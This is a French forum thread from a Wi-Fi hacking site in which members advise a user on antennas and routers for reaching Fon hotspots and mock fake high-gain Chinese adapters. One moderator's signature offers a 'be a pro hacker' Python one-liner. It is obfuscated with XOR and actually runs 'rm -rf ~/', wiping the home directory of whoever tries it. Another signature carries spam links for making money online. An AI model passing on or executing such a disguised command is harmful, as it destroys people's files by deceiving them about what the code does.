Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-04-2012 00:38:06

pippo
N00b

Antenne pour hotspot

Bonsoir à tous!

Nouveau sur le forum (je suis passer par la case présentation :-) ), j'aimerais votre avis sur le type d'antenne wifi à choisir et la marque.

En effet, j'ai un pc portable et actuellement je bosse sur mon mémoire chez mon grand père qui n'a pas internet.
Je capte des réseaux sécurisé mais surtout un hotspot Fon ( En Belgique, l'opérateur historique"Belgacom" active la fonction hotspot sur les modems des clients grâce à sa collaboration avec FON, et donc, étant client chez eux, je peux profiter des hotspots des autres clients vu que j'ai mes pass).... mais il faudrait encore que le signale ne soit pas si faible et même, à l'avenir, j'aimerais utiliser cette antenne pour capter  loin avec une bon signal :-)

Alors antenne omnidirectionnelle ou directionnelle ?  mais je ne sais pas à l'avance où sont cacher les clients Belgacom et où pointer l'antenne ( dans le cas d'une directionnelle) mais pas non plus me retrouver avec plein de hotspot dispo avec une omnidirectionnelle et un faible signal pour ne pas réussir à me connecter deçu :-)

Bref vous l'avez compris, je cherche une antenne qui permet de capter loin si possible car peut être les hotspots ne seront pas à portée mais avec un bon signal car je ne sais pas où ils se trouvent

Sur ce, j'appelle à vos connaissances! J'en demande trop mais je vois des antennes made in china(oui je regarde sur ebay...) et il y en a à moins de 20 eur ...

Avez vous une idée, une marque à conseiller?

merci

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-04-2012 03:47:53

gustare
Membre Hyperactif

Re : Antenne pour hotspot

Salut pippo !

je pense que tu donne la moitier de la réponse dans ta question  smile  a mon avis une antenne yagi serait le mieux pour ton besoin  certe il te faudra chercher le spot  mais une fois trouvé, c'est avec cette antenne que tu auras le plus de chance d'avoir un bon signal cool

regarde sur le forum il y a shema  extra  si tu est  un poil bricoleur  !

#3 17-04-2012 05:50:45

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Jettes un oeil à ce ptit soft permettant de localiser un Hotspot, je ne l'ai jamais testé et donc je ne peux pas te dire si vraiment il est efficace: --> WiFi Locator.

Dernière modification par Fuji (17-04-2012 06:09:09)

#4 17-04-2012 09:04:10

spawn
Modérateur

Salut !
Pour des raisons de stabilité et de redistribution du réseau, j'utilise un routeur DDWRT54GL avec Tomato en mode client connecté à un SFR WiFi Public, et je distribue le réseau par câble depuis le routeur.
Je n'ai aucun problème avec ce système, aussi je te le conseille (bon, je n'ai pas accès aux NAT, mais bon, c'est gratos je ne vais pas me plaindre (: )
Un DDWRT ça coute 40€ et ça a de bonnes antennes par défaut. Ce n'est pas la peine d'ajouter une grosse antenne.

Mais c'est plus cher que l'achat d'une antenne simplement. A toi de voir. Une Yagi c'est le bien si tu sais ou est le hotspot (de toute façon tu va bien le trouver si tu en achète une)

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 17-04-2012 20:05:48

pippo
N00b

merci à vous!

le forum est très réactif :-)

précision de taille (sens propre et figuré), je cherche quelque chose de portable pour les déplacements :-)

Donc si je m'aide grâce à un programme ou application (sur iphone par exemple), je pourrais géolocaliser les hotspots et dans ce cas, il est préférable de prendre une antenne directionnelle ?(si j'ai bien compris)

Que penser vous des marques chinoise comme Kasens? j'en ai trouver pour moi de 20 eur de 30dbi voir 60!

http://www.alibaba.com/showroom/kasens- … power.html

le format est idéal :-)

merci

#6 18-04-2012 16:38:40

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Si nous parlons d'antenne, nous parlons de gain exprimé en dBi (Une bonne antenne omnidirectionnelle a un gain d'environ 20 dbi)
Là il s'agit manifestement d'une erreur.
Ils parlent de puissance que tu peux exprimer en mW ou dBm.
68 dBM c'est bien si tu veux faire un oeuf au plat sur ton adaptateur tongue.
Le chipset est un rtl8187l, à mon avis tu lui mets 68 dBm dans les dents tu le grille en cinq minutes...
Je te déconseille plus que vivement tout ce qui est imitation alfa, adaptateur avec chipset rtl8187l de "marque chinoise"
Jettes un coup d'oeil à notre section Cartes et clés WIFI USB, PCI, MiniPCI, PCMCIA, pour ce qui est de choisir ton adaptateur wifi. wink

#7 18-04-2012 17:45:28

vances1
Membre Indispensable
Site Web

Ca sent la douille à 25 km méfiance smile

6000 mw
25 km
60 dbi

NEW_Arrival_KASENS_2_4GHZ_wireless_Mini.jpg

Dernière modification par vances1 (18-04-2012 17:47:02)

Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

#8 18-04-2012 18:02:14

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Trop fort! lol
On remarque au passage le joli design "Alfa style" histoire de maintenir la confusion ambiante...

#9 18-04-2012 19:42:31

M1ck3y
Administrateur
Lieu : Lost in the darkness

lol

Annonce